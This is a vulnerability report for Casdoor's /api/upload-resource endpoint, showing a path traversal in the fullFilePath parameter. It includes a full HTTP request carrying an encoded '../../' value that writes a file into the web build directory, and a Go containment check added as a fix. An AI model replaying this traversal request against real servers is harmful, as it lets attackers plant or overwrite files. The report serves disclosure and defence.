Hi, I found a security issue. When the upload provider is Storage Local File System, the fullFilePath parameter of the interface /api/upload-resource will have a directory spanning problem: the user can specify a relative path to write malicious files to the file system, or even overwrite files. My request message is shown below:
```
POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider_storage_local_file_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider_storage_local_file_system HTTP/1.1
Host: door.casdoor.com
Cookie: casdoor_session_id=2fd9ab275d8d65ea296ab327fd92166a
Content-Length: 192
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJM
Accept: */*
Origin: https://door.casdoor.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://door.casdoor.com/resources
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryUPAwhIoXMrbemuJM
Content-Disposition: form-data; name="file"; filename="spider.png"
Content-Type: image/png

I'm here.
------WebKitFormBoundaryUPAwhIoXMrbemuJM--
```
Then we can find out that the problem does occur by following this link:

https://door.casdoor.com/flag.html
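
The report above comes down to a client-supplied relative path being joined onto the local storage directory without checking where the result lands. The following containment check in Go is an added example, not part of the original issue and not Casdoor's code; `ResolveUploadPath`, `ErrOutsideBase` and the base directory `/srv/casdoor/files` are assumptions for illustration, and the traversal input is the URL-decoded `fullFilePath` from the request above.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideBase means the requested path does not resolve to a file under the storage root.
var ErrOutsideBase = errors.New("path escapes storage root")

// ResolveUploadPath (hypothetical helper) maps a client-supplied fullFilePath
// onto baseDir and refuses anything that lands outside it.
// The check is lexical: it does not follow symlinks that already exist under baseDir.
func ResolveUploadPath(baseDir, fullFilePath string) (string, error) {
	if fullFilePath == "" || strings.ContainsRune(fullFilePath, 0) {
		return "", ErrOutsideBase
	}
	base, err := filepath.Abs(baseDir)
	if err != nil {
		return "", err
	}
	// Join cleans the result: "//" collapses and ".." segments are resolved.
	target := filepath.Join(base, filepath.FromSlash(fullFilePath))
	rel, err := filepath.Rel(base, target)
	if err != nil {
		return "", err
	}
	// "." is the root itself; ".." or "../..." is above the root.
	if rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideBase
	}
	return target, nil
}

func main() {
	base := "/srv/casdoor/files" // constructed storage root
	for _, p := range []string{
		"resource/avatar.png",                 // ordinary upload
		"resource//../../web/build/flag.html", // decoded value from the report
	} {
		resolved, err := ResolveUploadPath(base, p)
		fmt.Printf("%-40q -> %q, err=%v\n", p, resolved, err)
	}
}
```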